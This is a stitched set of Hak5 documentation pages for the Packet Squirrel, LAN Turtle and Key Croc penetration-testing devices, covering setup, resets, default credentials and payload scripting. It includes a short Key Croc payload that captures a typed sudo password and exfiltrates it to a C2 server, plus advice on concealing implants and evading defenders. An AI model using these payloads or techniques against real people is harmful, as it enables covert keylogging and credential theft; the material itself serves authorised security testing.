* sshfs
* tcpdump
* wget
Additionally a utility to reformat a USB flash disk is included:
* reformat\_usb
* * *
[_navigate\_before_ The Button Command](https://docs.hak5.org/packet-squirrel/payload-development/the-button-command/)
[Firmware Recovery _navigate\_next_](https://docs.hak5.org/packet-squirrel/troubleshooting/firmware-recovery/)
---
# Factory Reset | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Factory Reset
=============
Settings may be restored to defaults using the factory reset procedure. This process will restore the device to the initial configuration of the latest installed firmware. Upon performing the factory reset procedure, all settings including password will be reset. To perform a factory reset from a fully booted Packet Squirrel, hold the push button for approximately 7 seconds. The device will then reboot.
* * *
[_navigate\_before_ Firmware Recovery](https://docs.hak5.org/packet-squirrel/troubleshooting/firmware-recovery/)
[Faq _navigate\_next_](https://docs.hak5.org/packet-squirrel/troubleshooting/faq/)
---
# Logging Network Traffic | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Logging Network Traffic
=======================
The built-in tcpdump payload from switch position 1 will save standard pcap files to a loot folder on a USB flash drive. This payload doesn’t require any configuration to use, other than having a properly formatted USB flash drive.
The USB flash drive must be formatted in either the **NTFS** (Windows, Mac OSX) or **EXT4** (Linux) file system. This is of particular importance since most USB drives come formatted with a FAT32 or exFAT file system.
1. Plug a USB drive formatted in NTFS or EXT4 into the USB host port on the right side of the Packet Squirrel.
2. Flip the switch to position 1 to select the built-in tcpdump payload. Position one is on the far left, closest to the Micro USB power port.
3. Plug the device you want to capture packets from into the Ethernet In port. It’s the Ethernet port on the left side above the Micro USB power port. This could be a computer, a network printer, an IP camera, or similar.
4. Plug the network into the Ethernet Out port. That’s the one on the side with the USB type A female port.
5. Power on the Packet Squirrel with a Micro USB cable and any ordinary USB power adapter like a smartphone charger, a computer’s USB port, USB battery bank, etc…
6. Wait 40 seconds while the Packet Squirrel boots up, indicated by a flashing green LED. Once booted, tcpdump will begin saving pcap files containing the packets between the two Ethernet links to a loot folder on the inserted USB disk, indicated by a single flashing yellow LED.
7. When you’re ready to stop capturing packets, press the button atop the Packet Squirrel. The LED will flash red to indicate that the file has completed writing to the USB flash drive. It is now safe to unplug the Packet Squirrel, remove the USB flash drive, and inspect the stored pcap file with a protocol analyzer such as Wireshark.
The `tcpdump` payload will write a pcap file to a connected USB disk until the disk is full. A full disk will be indicated by a solid green LED.
If the Packet Squirrel is powered off before pressing the button, the file may be corrupt or unreadable.
If the Packet Squirrel is unable to read the USB disk (for example if the disk has not been formatted as NTFS or EXT4) the payload will fail, indicated by a blinking red LED.
* * *
[_navigate\_before_ Selecting And Adding Payloads](https://docs.hak5.org/packet-squirrel/getting-started/selecting-and-adding-payloads/)
[Spoofing Dns _navigate\_next_](https://docs.hak5.org/packet-squirrel/default-payloads/spoofing-dns/)
---
# Factory Reset | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Factory Reset
=============
In the extreme case that the Key Croc has become permanently inaccessible or inoperative, there is a quick method for recovery using a special boot pattern.
warning
If protect arming mode is enabled, you must first disable this feature by removing the corresponding lines in config.txt and restarting the device before attempting a factory reset, otherwise the arming mode may become permanently locked.
Hold the arming mode button with a paperclip, SIM card tool or similar instrument.
1. While holding the arming mode button, plug the Key Croc into a USB port and unplug it immediately after the green LED turns white.
2. Repeat step #2 three times while holding the arming mode button.
3. Finally, plug the Key Croc into a USB port a 4th time when when the green LED turns to an alternating red/blue pattern, release the arming mode button.
4. This process will take 5-10 minutes. When the firmware recovery has completed, the Key Croc will reboot, indicated by the green LED.
Technical note: This process will replace the primary boot partition with a copy of firmware version 1.0 kept on a backup partition. If the backup partition has been damaged, this process will fail.
* * *
[_navigate\_before_ Updating The Firmware](https://docs.hak5.org/key-croc/basics/updating-the-firmware/)
[Getting The Key Croc Online _navigate\_next_](https://docs.hak5.org/key-croc/beginner-guides/getting-the-key-croc-online/)
---
# Faq | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Faq
===
I’M NOT GETTING AN IP ADDRESS FROM THE PACKET SQUIRREL IN ARMING MODE [_link_](https://docs.hak5.org/packet-squirrel/troubleshooting/faq/#im-not-getting-an-ip-address-from-the-packet-squirrel-in-arming-mode)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Make sure you’re plugging your computer into the “Ethernet In” port on left side of the device. This is the LAN port, which will offer the receiving device an IP address via DHCP. The “Ethernet Out” port on the right side of the device is the WAN port, which will seek to obtain an IP address via DHCP.
MY PACKET SQUIRREL DOESN’T LIGHT UP FOR THE FIRST 10 SECONDS ON BOOT [_link_](https://docs.hak5.org/packet-squirrel/troubleshooting/faq/#my-packet-squirrel-doesnt-light-up-for-the-first-10-seconds-on-boot)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
This is normal, expected behavior. The boot-up process takes 30-40 seconds, at which time the LED will blink green starting at around the 10 second mark.
IS THE PACKET SQUIRREL GIGABIT? [_link_](https://docs.hak5.org/packet-squirrel/troubleshooting/faq/#is-the-packet-squirrel-gigabit)
------------------------------------------------------------------------------------------------------------------------------------
No, but it will auto negotiate down to 100 Mbps. In most scenarios, like planting it behind a network printer or workstation, it won’t be a bottleneck.
DOES THE PACKET SQUIRREL DO POE? [_link_](https://docs.hak5.org/packet-squirrel/troubleshooting/faq/#does-the-packet-squirrel-do-poe)
--------------------------------------------------------------------------------------------------------------------------------------
No, that wouldn’t fit in its tiny footprint. However, it is powered by USB with an extremely low (120 mA) draw.
WHAT ARE THE HARDWARE SPECIFICATIONS? [_link_](https://docs.hak5.org/packet-squirrel/troubleshooting/faq/#what-are-the-hardware-specifications)
------------------------------------------------------------------------------------------------------------------------------------------------
* Atheros AR9331 SoC at 400 MHz MIPS
* 16 MB Onboard Flash
* 64 MB DDR2 RAM
* 2x 10/100 Ethernet Port
* USB 2.0 Host Port
* 4-way payload select switch
* RGB Indicator LED
* Scriptable Push-Button
* Power: USB 5V 120mA average draw
* Dimensions: 50 x 39 x 16 mm
* Weight: 24 grams
* * *
[_navigate\_before_ Factory Reset](https://docs.hak5.org/packet-squirrel/troubleshooting/factory-reset/)
---
# Power Considerations | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Power Considerations
====================
The LAN Turtle is powered via USB and requires 5V at ~200mA. Typical power usage is 1 Watt. Below are some example deployment scenarios and power considerations.
* Covertly installed in an available USB port on the back of a desktop computer at a client site, either in an “Ethernet Pass-through” configuration (With Network access provided by the LAN Turtle) or standalone (such as for DNS Poisoning).
* Concealed in a network closet plugged into Ethernet powered by a USB Battery Pack. For example: the Pineapple Juice 15000 USB Battery from HakShop.com would power the LAN Turtle for ~3 days.
* Concealed in a telephone room plugged into a free Ethernet cable powered by a typical smartphone USB wall charger.
* Concealed in a server rack powered by a server’s available USB port using a USB Data Blocker inline USB dongle (Available from HakShop.com) to prevent the server’s operating system from identifying the LAN Turtle.
* Connected to a penetration tester’s Android tablet or smartphone using a USB OTG cable (available from HakShop.com) for use on-the-go with an Android SSH client. Note: Some smartphones and tablets do not provide the current necessary to power the LAN Turtle. Most Nexus models have been tested to function properly.
* * *
[_navigate\_before_ Your First Reverse Shell](https://docs.hak5.org/lan-turtle/setup-guides/your-first-reverse-shell/)
[Specifications _navigate\_next_](https://docs.hak5.org/lan-turtle/faq-troubleshooting/specifications/)
---
# Key Croc Basics | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Key Croc Basics
===============
#Key Croc Basics
Deployment [_link_](https://docs.hak5.org/key-croc/basics/key-croc-basics/#deployment)
---------------------------------------------------------------------------------------
In its most basic state, the Key Croc acts as a keylogger. To deploy, simply plug the Key Croc into a computer – known herein as the target. Within a few seconds the Key Croc will boot, lighting multiple colors along the way to indicate its state (described below). If a keyboard is not attached to the Key Croc at boot, the LED indicates such with a white light. Plugging a standard IBM-PC compatible USB keyboard into the Key Croc will cause the LED to turn off and the device to enter what is known as Attack Mode. The Key Croc will then clone the hardware identifiers of the keyboard and present itself to the target as that keyboard. Keystrokes typed on the keyboard will be passed through to the target, while simultaneously saving to a log file on the Key Croc. Any active payload will execute once the target types a defined matching key sequence.\\
Setup via ARMING MODE [_link_](https://docs.hak5.org/key-croc/basics/key-croc-basics/#setup-via-arming-mode)
-------------------------------------------------------------------------------------------------------------
Pressing the hidden arming button on the bottom side of the Key Croc will stop the keystroke passthrough and recording. The Key Croc will enter what is known as Arming Mode, indicated by a blue blinking LED. Instead of emulating the connected keyboard, the Key Croc will now emulate both a serial device and USB flash disk – known as the udisk. Accessing this USB flash disk or udisk, with its drive label “KeyCroc”, will present the operator with a number of files and folders.
Among the files and folders present on the USB flash disk is config.txt. Editing this file with a standard text editor (like Notepad on Windows, TextEdit on Mac, vim/nano on Linux) will let you configure settings such as keymap, WiFi, SSH and DNS.\\
Compatibility [_link_](https://docs.hak5.org/key-croc/basics/key-croc-basics/#compatibility)
---------------------------------------------------------------------------------------------
While the Key Croc will enumerate properly with any operating system as a keyboard, compatibility with the keyboard it is intercepting can sometimes be a concern. While all keyboards at a high level “speak the same language” with the host (USB HID) not all do so via the same endpoints, or using **only the default drivers.** The Key Croc is compatible with **most** USB keyboards with a few exceptions.
warning
The device has the job of both capturing keystrokes and passing through those keystrokes.
One or both of those features may not work for the following types of keyboards:
* Some gaming keyboards
* Keyboard “trackpad” combos
* Apple keyboards
info
As with anything, you will want to test the functionality prior to deployment on an engagement to ensure success.
* * *
[_navigate\_before_ Keycroc by Hak5](https://docs.hak5.org/key-croc/keycroc-by-hak5/)
[Serial Console Access _navigate\_next_](https://docs.hak5.org/key-croc/basics/serial-console-access/)
---
# Getting The Packet Squirrel Online | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Getting The Packet Squirrel Online
==================================
To get your Packet Squirrel online, plug it into an Internet connected network that supports DHCP. By default the Packet Squirrel will be looking for a network connection from its Ethernet Out port, otherwise known as its WAN port. This is the RJ45 jack on the right side of the device above the female USB type A port.
* * *
[_navigate\_before_ Openvpn Payload](https://docs.hak5.org/packet-squirrel/default-payloads/openvpn-payload/)
[Upgrading Firmware _navigate\_next_](https://docs.hak5.org/packet-squirrel/software-updates/upgrading-firmware/)
---
# First Boot And Software Update | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
First Boot And Software Update
==============================
* * *
[_navigate\_before_ Manual Upgrade](https://docs.hak5.org/lan-turtle/faq-troubleshooting/manual-upgrade/)
[Man In The Middle With Dns Spoof _navigate\_next_](https://docs.hak5.org/lan-turtle/video-guides/man-in-the-middle-with-dns-spoof/)
---
# New Features In Key Croc 1.3 | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
New Features In Key Croc 1.3
============================
[Key Croc](https://shop.hak5.org/products/key-croc)
firmware version 1.3 is here and with it comes so very exciting new features, making the smart keylogger even smarter! You can read all about it in the official [release forum post](https://forums.hak5.org/topic/52333-release-key-croc-firmware-13/)
, grab a copy from [downloads.hak5.org](https://downloads.hak5.org/)
, and see the full details on each command from [docs.hak5.org](https://docs.hak5.org/)
. Let’s take a look at some of the highlights.
SAVEKEYS UNTIL [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#savekeys-until)
---------------------------------------------------------------------------------------------------------------------
One of the greatest features of the [Key Croc](https://shop.hak5.org/products/key-croc)
is the intelligent `SAVEKEYS` command. Coupled with `MATCH`, which tells a payload when to trigger, it lets you save either a set amount of keys that were typed before or after the payload is triggered.
Now, in addition to the `LAST` and `NEXT` parameters, `SAVEKEYS` introduces `UNTIL`. As the name states, this allows you to save keys to a file `UNTIL` a specified value is typed. That value can be a simple string or single key, or an entire regular expression!

> `MATCH sudo SAVEKEYS /root/loot/password.txt UNTIL \[ENTER\](.*?)\[ENTER\] WAIT_FOR_LOOT /root/loot/sudo-pass.txt C2EXFIL STRING /root/loot/sudo-pass.txt.filtered PASSWD C2NOTIFY INFO 'Captured Target Sudo Password'`
>
For example, in this payload is executed when the user types “`sudo`”. Then it saves the keys typed to the password.txt file until the `ENTER` key is pressed twice. Magic!
PROTECTED ARMING MODE [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#protected-arming-mode)
-----------------------------------------------------------------------------------------------------------------------------------
This feature was born out of a pull request to the Key Croc payload repository by none other than Hacker’s own [0xDade](https://twitter.com/0xdade)
. He wanted the ability to protect the Key Croc from entering arming mode with the push button by any would-be Blue Teamers when deploying the Key Croc on a Red Team engagement.
The solution was an elegant system whereby a password would need to be typed on the attached keyboard before the button could be pressed, otherwise the Key Croc would not enter arming mode as usual.
We liked the idea so much that we rolled it into the official firmware. You can now specify an arming mode password with `ARMING_PASS` in your config.txt. Likewise if you’d like to set a window of time in which the button must be pressed after the password is typed, add `ARMING_TIMEOUT`. Thanks for the contribution 0xDade!
report
If performing a factory reset, be sure to first disable protected arming mode.

NEW DUCKY SCRIPT COMMANDS [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#new-ducky-script-commands)
-------------------------------------------------------------------------------------------------------------------------------------------
A host of new Ducky Script commands have been added, making power payloads even easier to write.
**NATIVE DUCKY SCRIPT FROM FILES** [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#native-ducky-script-from-files)
---------------------------------------------------------------------------------------------------------------------------------------------------------
`QUACKFILE` (alias `QFILE`) – with this you specify a separate text file containing Ducky Script that 1. doesn’t need each command prefixed with `QUACK` and 2. doesn’t require any bash special character escaping! Perfect for large blocks of text, and adding support out of the box for so many of the existing payloads for the [USB Rubber Ducky](https://shop.hak5.org/products/usb-rubber-ducky-deluxe)
!
**RUN-ONCE AND MULTI-STAGE PAYLOADS** [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#run-once-and-multi-stage-payloads)
---------------------------------------------------------------------------------------------------------------------------------------------------------------
`ENABLE_PAYLOAD` and `DISABLE_PAYLOAD` now let you either enable or disable a payload systematically from within your payload. For example, if you only want a payload to run once, after you’ve ensured that the desired loot has been obtained you can issue `DISABLE_PAYLOAD` file-name.txt followed by `RELOAD_PAYLOADS` and it won’t run again.
Similarly you can use `ENABLE_PAYLOAD` file-name.txt followed by `RELOAD_PAYLOADS` commands to have your first stage activate a second stage!
**CHECKING FOR HUMANS** [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#checking-for-humans)
-----------------------------------------------------------------------------------------------------------------------------------
`WAIT_FOR_KEYBOARD_ACTIVITY` and `WAIT_FOR_KEYBOARD_INACTIVITY` are new commands that let you know if the human operator is present, or likely AFK. You can specify a timeout and optional interval.
With `WAIT_FOR_KEYBOARD_INACTIVITY` you can ensure that after a payload has triggered, it doesn’t continue until a set amount of time has elapsed since there was any keyboard activity.
Likewise `WAIT_FOR_KEYBOARD_ACTIVITY` can be used to pause a payload that’s triggered until the human operator starts typing.
**WAITING FOR LOOT!** [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#waiting-for-loot)
------------------------------------------------------------------------------------------------------------------------------
Timing is everything. When writing a simple payload like the Windows password grabber in the above screenshot, you’ll likely want to do something with the loot captured. In the case of this simple example payload, we trigger when the user hits Control+Alt+Delete. Then we save whatever keys the user types to a loot file until they press enter. But how do we know when we have said loot? Enter `WAIT_FOR_LOOT`. This new command will pause the payload from continuing until the specified file has been created.
What if you’re appending to an existing file? In that case you can specify an interval in seconds after the file name, and the payload will pause until the loot file stops growing in size. Perfect for exfiltrations!
Pro tip: When exfiltrating a large directory of files, set your payload to `WAIT_FOR_LOOT done.txt`. Then in your exfiltration script, make sure that when your copy command has completed, you create new file called “`done.txt`”. Voila!

NEW ATTACKMODE OPTIONS [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#new-attackmode-options)
-------------------------------------------------------------------------------------------------------------------------------------
One of the nice things about the Key Croc is that it will automatically clone the Vendor ID (VID) and Product ID (PID) of the attached keyboard. You’ll see this in the current working ATTACKMODE if you cat the file `/tmp/mode` as `VID_xxxx` and `PID_xxxx` options.
Now you can override the cloning by specifying `VID` and `PID` with the same `ATTACKMODE` format from your `config.txt`. Now the Serial Number (`SN_xxxx`), Manufacturer (`MAN_xxxx`) – which have always been available to set from the `ATTACKMODE` command – can be specified from `config.txt`.
Additionally, we’ve introduced PROD for iProduct – the USB descriptor which tells the target computer a brief string about what it is. If you’ve ever seen the Key Croc enumerate as an RNDIS Gadget, it’s coming from this value. So if you wanted to, you could add the following to your config.txt
> `MAN MAN_Hak5 PROD PROD_KeyCroc SN SN_1337`
>
Ok, so the serial number is made up but the first two are true. Use your imagination for these values on your next pentest.
New Variables for use in Payloads [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#new-variables-for-use-in-payloads)
-----------------------------------------------------------------------------------------------------------------------------------------------------------
There’s a lot that the Key Croc can tell about itself and the target which make for richer payload experiences. One obvious one would be the IP address of the target computer when using an Ethernet `ATTACKMODE` like `RNDIS_ETHERNET` for Windows targets, or `ECM_ETHERNET` for Linux/Mac targets (or my favorite, `AUTO_ETHERNET` which will try both).
Previously to get the target’s IP address you could cat, grep, sed and awk the dhcp.leases file – but now you can simply issue `GET_VARS` in your payload and it’ll export a plethora of variables. One of my favorites is `$TARGET_HOSTNAME`, which would be the name of the computer - perfect for naming loot files.
> `VID PID MAN PROD HOST_IP TARGET_IP TARGET_HOSTNAME`
>
NEW SCRIPTS AND FRAMEWORK FUNCTIONS [_link_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/#new-scripts-and-framework-functions)
---------------------------------------------------------------------------------------------------------------------------------------------------------------
There are a ton of features specific to the Key Croc payload framework which can now be sourced and used in your payload. For instance, if you want to systematically change WiFi settings, change language/keymap, or manage the udisk. To get a full list of the available functions and what they do, issue the `GET_HELPERS` command from a shell on the Key Croc.
That’s just one of the new script, which compliment the intuitively named `WAIT_FOR_ARMING_MODE`, `WAIT_FOR_BUTTON_PRESS`, and `ARMING_MODE`.
Those are just some of the awesome new features that await with Key Croc version 1.3. You can find full documentation for all of the commands at [docs.hak5.org](https://docs.hak5.org/)
.
So, what would you like to see in 1.4? Let us know on the [forums](https://forums.hak5.org/topic/52333-release-key-croc-firmware-13/)
! \\
* * *
[_navigate\_before_ Getting The Key Croc Online](https://docs.hak5.org/key-croc/beginner-guides/getting-the-key-croc-online/)
[Password Sniffing With The Key Croc Easy Or Super Easy _navigate\_next_](https://docs.hak5.org/key-croc/beginner-guides/password-sniffing-with-the-key-croc-easy-or-super-easy/)
---
# Payload Development Basics | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Payload Development Basics
==========================
Packet Squirrel payloads can be written in any standard text editor, such as notepad, vi or nano.
Payloads may be written in bash, Python or PHP and as such must be named payload.sh, payload.py or payload.php respectively. Additionally a payload.txt file will be processed according to its interpreter directive.
All payloads should begin with an interpreter directive. For example, bash payloads should begin with the typical shebang /bin/bash
`#!/bin/bash`
Similarly, Python payloads should begin with shebang /usr/bin/python
`#!/usr/bin/python`
* * *
[_navigate\_before_ Manual Upgrade](https://docs.hak5.org/packet-squirrel/software-updates/manual-upgrade/)
[Ducky Script For Packet Squirrel _navigate\_next_](https://docs.hak5.org/packet-squirrel/payload-development/ducky-script-for-packet-squirrel/)
---
# Default Settings | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Default Settings
================
DEFAULT SETTINGS [_link_](https://docs.hak5.org/key-croc/configuration/default-settings/#default-settings)
-----------------------------------------------------------------------------------------------------------
* username:
`root`
* password:
`hak5croc`
* hostname: croc
LED STATUS INDICATIONS [_link_](https://docs.hak5.org/key-croc/configuration/default-settings/#led-status-indications)
-----------------------------------------------------------------------------------------------------------------------
* Green – Booting up
* Red – Error
* Red Blinking Slow - invalid payload(s)
* Cyan – Configuring WiFi per config.txt
* Magenta – Configuring Keylogger
* Blue – Arming Mode
* Yellow – Disk Full
* White – No Keyboard Detected
* * *
[_navigate\_before_ Configuring Cloud C](https://docs.hak5.org/key-croc/configuration/configuring-cloud-c/)
[Understanding Languages _navigate\_next_](https://docs.hak5.org/key-croc/configuration/understanding-languages/)
---
# Understanding Languages | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Understanding Languages
=======================
The Key Croc is capable of capturing and injecting keystrokes from various keyboard layouts – also known as languages. Since keyboard layouts differ from country to country, this is an important consideration when deploying your Key Croc. For US-English users, the Key Croc is already configured by default for this layout.
The languages directory from the Key Croc udisk is host to a number of keymap files in json format. Named with the two letter country designation, these files map the characters seen on the screen and often printed on the keyboard with the scan codes sent by keyboard to the computer via the USB Human Interface Device specification.
For example, with the US language the letter “`a`” on the keyboard is mapped to the scan code “`00,00,04`”.
To set the keyboard layout, change the `DUCKY_LANG` value in the config.txt file on the root of the Key Croc udisk with the two letter country abbreviation listed from the languages directory.
* * *
[_navigate\_before_ Default Settings](https://docs.hak5.org/key-croc/configuration/default-settings/)
[Payload Development _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/payload-development/)
---
# Manual Upgrade | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Manual Upgrade
==============
Packet Squirrel firmware may be updated via USB as described in the [updating firmware article](https://docs.hak5.org/hc/en-us/articles/360010470374)
. That said, it is also possible to manually upgrade the firmware by following this process:
1. Download the latest UPDATE file from [https://downloads.hak5.org/squirrel](https://downloads.hak5.org/squirrel)
and verify its checksum.
2. Power on the Packet Squirrel in Arming Mode
3. Manually SCP the file to the Packet Squirrel’s /tmp directory (e.g. `scp upgrade-3.1.bin root@172.16.32.1:/tmp/`)
4. SSH into the Packet Squirrel (e.g. `ssh root@172.16.32.1`)
5. From the Packet Squirrel’s bash prompt, issue the sysupgrade command relevant to your firmware update file (e.g. `sysupgrade -n /tmp/upgrade-3.1.bin`)
6. Wait 5-10 minutes as the Packet Squirrel flashes the firmware and reboots.
report
DO NOT unplug the device during the process as doing so will render the device inoperable.
* * *
[_navigate\_before_ Upgrading Firmware](https://docs.hak5.org/packet-squirrel/software-updates/upgrading-firmware/)
[Payload Development Basics _navigate\_next_](https://docs.hak5.org/packet-squirrel/payload-development/payload-development-basics/)
---
# Ducky Script Commands | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Ducky Script Commands
=====================
BASICS [_link_](https://docs.hak5.org/key-croc/writing-payloads/ducky-script-commands/#basics)
-----------------------------------------------------------------------------------------------
* `MATCH` – specifies a pattern that must be typed to trigger payload execution
* `SAVEKEYS` – saves next or last typed keys to a specified file when a MATCH is found
* `QUACK` – injects keystrokes using Ducky Script 2.0\\
* `QUACKFILE` – injects keystrokes from specified file
* `ATTACKMODE` – specifies which device type to emulate
* `LED` – controls the multi-color LED
* `GET_VARS` – returns useful variables for use in payload
PAYLOAD CONTROL & DEVELOPMENT [_link_](https://docs.hak5.org/key-croc/writing-payloads/ducky-script-commands/#payload-control--development)
--------------------------------------------------------------------------------------------------------------------------------------------
* `RELOAD_PAYLOADS` – instructs the payload framework to reingest payloads from disk
* `CHECK_PAYLOADS` – checks the `MATCH` and `SAVEKEYS` syntax of the loaded payloads
* `RECORD_PAYLOAD` – interactive payload recorder
* `ENABLE_PAYLOAD` – enables payload
* `DISABLE_PAYLOAD` – disables payload\\
EXTRAS [_link_](https://docs.hak5.org/key-croc/writing-payloads/ducky-script-commands/#extras)
-----------------------------------------------------------------------------------------------
* `INSTALL_EXTRAS` – installs optional third party tools
* `KEYBOARD` – reports if a keyboard is present or missing
* `udisk` – mount, unmount and format the udisk partition
\\
WAIT COMMANDS [_link_](https://docs.hak5.org/key-croc/writing-payloads/ducky-script-commands/#wait-commands)
-------------------------------------------------------------------------------------------------------------
* `WAIT_FOR_KEYBOARD_ACTIVITY` – halts payload until keyboard activity is detected
* `WAIT_FOR_KEYBOARD_INACTIVITY` – halts payload until keyboard is inactive for specified time
* `WAIT_FOR_LOOT` – halts payload until specified loot is received
\\
CLOUD C2 COMMANDS [_link_](https://docs.hak5.org/key-croc/writing-payloads/ducky-script-commands/#cloud-c2-commands)
---------------------------------------------------------------------------------------------------------------------
* `C2NOTIFY` – sends a notification to the configured Cloud C2 server
* `C2EXFIL` – sends a file to the configured Cloud C2 server
* * *
[_navigate\_before_ Payload Development](https://docs.hak5.org/key-croc/writing-payloads/payload-development/)
[Command Quick Reference _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/)
---
# The MATCH Command | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The MATCH Command
=================
`MATCH` specifies a string or regular expression that may be typed on the keyboard connected to the Key Croc to trigger the payload’s execution.
MATCH STRINGS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-match-command/#match-strings)
---------------------------------------------------------------------------------------------------------
A simple string, such as “hello”, may be used as a match.
`MATCH hello`
The payload code following this `MATCH` command will be executed when the target types “hello”.
MATCH MULTIPLE STRINGS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-match-command/#match-multiple-strings)
---------------------------------------------------------------------------------------------------------------------------
Multiple strings may be specified with this simple regular expression.
`MATCH (root|admin|mubix)`
In this case, the payload code following the `MATCH` command will be executed when the target types either “root” or “admin” or “mubix”.
MATCH REGULAR EXPRESSIONS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-match-command/#match-regular-expressions)
---------------------------------------------------------------------------------------------------------------------------------
Complex patterns may be specified using regular expressions.
`MATCH [0-9]{5}(?:-[0-9]{4})?`
In this case, the payload code following the `MATCH` will execute when the target types numbers which represent an American ZIP (postal) code.
Regular expressions should be in Python Regex format and should omit start and end line indicators as the `MATCH` pattern will be checked against a continuous stream of keystrokes. For example:
* `MATCH dallas` – correct usage
* `MATCH ^dallas$` – incorrect usage
The [regex101.com](https://regex101.com/)
is a recommended third party resource for testing regular expressions in Python format.
MATCH KEY COMBINATIONS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-match-command/#match-key-combinations)
---------------------------------------------------------------------------------------------------------------------------
Any key combination defined in the language file (e.g. `udisk/languages/us.json`) may be used as a `MATCH`. Keep in mind, since MATCH expects a regular expression, escaping may be necessary. For example:
* `MATCH \[CTRL-ALT-DELETE]` – correct usage
* `MATCH [CTRL-ALT-DELETE]` – incorrect usage
ADDITIONAL `MATCH` CONSIDERATIONS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-match-command/#additional-match-considerations)
-----------------------------------------------------------------------------------------------------------------------------------------------
When the target types a pattern which matches the defined `MATCH` command in a payload, two important things happen.
First, a timestamped log entry is appended to the matches.log file. This file, like other loot, is stored in /root/loot while in Attack Mode, then synchronized with `/root/udisk/loot` when entering Arming Mode.
Second, the variable `$loot` will become available for use in the payload, containing the pattern which triggered the match.
Finally, one should consider that `MATCH` is not actually a bash command, rather a Key Croc command which is interpreted by the Payload Framework. As such, typing `MATCH` in the Key Croc command prompt will not yield results, and changing the `MATCH` value live will not have effect unless payloads are reloaded. See the section on interactive payload development for more on `RELOAD_PAYLOADS`.
report
Do not use the word “`MATCH`” in a payload’s comment as doing so will cause interpretation issues with the Key Croc payload parser.
* * *
[_navigate\_before_ Command Quick Reference](https://docs.hak5.org/key-croc/writing-payloads/command-quick-reference/)
[The SAVEKEYS Command _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/the-savekeys-command/)
---
# The SAVEKEYS Command | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The SAVEKEYS Command
====================
`SAVEKEYS` allows the payload to save specific keys typed by the target when the payload has executed with a valid `MATCH`. `SAVEKEYS` can either save the `LAST` keys typed before a `MATCH`, or the `NEXT` keys typed after a `MATCH`.
USAGE [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-savekeys-command/#usage)
--------------------------------------------------------------------------------------------
`SAVEKEYS /absolute/path/to/file.log [NEXT | LAST | UNTIL] N (Number of keys)`
SAVEKEYS NEXT [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-savekeys-command/#savekeys-next)
------------------------------------------------------------------------------------------------------------
Here’s a brief example of using `SAVEKEYS` with `NEXT`:
